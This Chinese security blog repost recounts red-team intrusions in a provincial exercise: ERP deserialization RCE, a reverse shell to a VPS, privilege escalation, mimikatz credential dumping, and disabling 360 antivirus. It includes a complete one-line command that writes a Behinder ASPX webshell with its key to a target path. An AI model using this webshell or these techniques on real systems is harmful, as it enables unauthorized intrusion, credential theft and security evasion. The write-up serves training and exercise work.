红蓝|浅谈某省护打点经历(思路+工具)

admin 2024年8月29日17:46:51评论38 views字数 1587阅读5分17秒阅读模式

此文章只为学习而生,请勿干违法违禁之事,本公众号只在技术的学习上做以分享,此文章由粉丝投稿,热乎的省护,所有信息皆已脱敏,就看个思路,所有行为与本公众号无关。

sdfd

01

单位1

红蓝|浅谈某省护打点经历(思路+工具)

通过鹰图搜索引擎找到靶标资产,发现该IP下存在X蝶-X星空的资产。

红蓝|浅谈某省护打点经历(思路+工具)

该系统的攻击路径有4条:

  1. X蝶-X星空 SaveUserPassport.common.kdsvc 反序列化命令执行漏洞

  2. X蝶-X星空 GetServiceUri.common.kdsvc 反序列化命令执行漏洞

  3. X蝶-X星空 CloseForm.common.kdsvc 反序列化命令执行漏洞

  4. X蝶-X星空 GetImportOutData.common.kdsvc 反序列化命令执行漏洞

01

任意文件读取

通过FileProxyHandler.kdfile 任意文件读取漏洞读取配置文件信息:

红蓝|浅谈某省护打点经历(思路+工具)

红蓝|浅谈某省护打点经历(思路+工具)

02

突破边界

 SaveUserPassport.common.kdsvc反序列化漏洞:

红蓝|浅谈某省护打点经历(思路+工具)

GetServiceUri.common.kdsvc 反序列化命令执行漏洞:

红蓝|浅谈某省护打点经历(思路+工具)

CloseForm.common.kdsvc 反序列化命令执行漏洞:

红蓝|浅谈某省护打点经历(思路+工具)

GetImportOutData.common.kdsvc 反序列化命令执行漏洞:

红蓝|浅谈某省护打点经历(思路+工具)

这四条路径都可以拿到shell,反弹shell到vps,获取服务器控制权:

红蓝|浅谈某省护打点经历(思路+工具)

在内网进行资产收集,也成功找到了该系统的内网环境证明确实进入了目标单位的内网:

红蓝|浅谈某省护打点经历(思路+工具)

03

提权

 使用ms16-075漏洞进行权限提升,获取System权限。

红蓝|浅谈某省护打点经历(思路+工具)

在获取System权限之后运行mimikatz.exe,获取NTLM hash并解密得到Administrator的密码,后续进行哈希传递/密码传递利用。

红蓝|浅谈某省护打点经历(思路+工具)

红蓝|浅谈某省护打点经历(思路+工具)

04

弱口令/FTP

 ftp匿名登录:

红蓝|浅谈某省护打点经历(思路+工具)

打印机弱口令:

红蓝|浅谈某省护打点经历(思路+工具)

02

单位2

此单位比较扯淡,UI和蜜罐似的,实际并不是。

红蓝|浅谈某省护打点经历(思路+工具)

存在于段子里的SQL注入:登录窗SQL注入。

红蓝|浅谈某省护打点经历(思路+工具)

echo "<%@ Page Language="C#" %><%@Import Namespace="System.Reflection"%><%Session.Add("k","e45e329feb5d925b"); /*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%>" > "D:WebSitea.aspx"

这样直接写入冰蝎马,连上后发现上线不了CS,存在杀软。

红蓝|浅谈某省护打点经历(思路+工具)

后面通过MSF先上线,然后再通过反弹到CS上,上线了CS。

红蓝|浅谈某省护打点经历(思路+工具)

然后用甜土豆成功提权,开启RDP+添加管理员用户上去关闭杀软。

红蓝|浅谈某省护打点经历(思路+工具)

发现是360防护并非腾讯。

红蓝|浅谈某省护打点经历(思路+工具)

然后用hi360直接杀掉杀软进程。

红蓝|浅谈某省护打点经历(思路+工具)

后续工具无碍不会被杀,但是此设备在超融合中,扫内网无其他资产,无后续利用。

03

单位3

01

确认资产

 该IP为靶标资产,发现8070端口存在某翼应用虚拟化系统。

红蓝|浅谈某省护打点经历(思路+工具)

红蓝|浅谈某省护打点经历(思路+工具)

02

RCE

红蓝|浅谈某省护打点经历(思路+工具)

nday写webshell,然后用蚁剑连接:

红蓝|浅谈某省护打点经历(思路+工具)目标单位网络边界被突破。

红蓝|浅谈某省护打点经历(思路+工具)

03

横向同类资产

红蓝|浅谈某省护打点经历(思路+工具)

红蓝|浅谈某省护打点经历(思路+工具)

红蓝|浅谈某省护打点经历(思路+工具)

红蓝|浅谈某省护打点经历(思路+工具)

红蓝|浅谈某省护打点经历(思路+工具)

03

弱口令

红蓝|浅谈某省护打点经历(思路+工具)

▲ web

红蓝|浅谈某省护打点经历(思路+工具)

▲ ssh

04

ms170170

红蓝|浅谈某省护打点经历(思路+工具)

04

杂谈

三个案例,看点思路,中间没有特别详细的流程,打完点后是常规内网利用,里面用到过免杀的项目是:RingQ(但后续在没过杀软的系统用手工关闭)、关闭360的项目(hi360)。

红蓝|浅谈某省护打点经历(思路+工具)

资源共享->网盘分享

红蓝|浅谈某省护打点经历(思路+工具)

内网->关闭杀软

原文始发于微信公众号(阿呆攻防):红蓝|浅谈某省护打点经历(思路+工具)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月29日17:46:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   红蓝|浅谈某省护打点经历(思路+工具)http://cn-sec.com/archives/3109162.html

发表评论

匿名网友 填写信息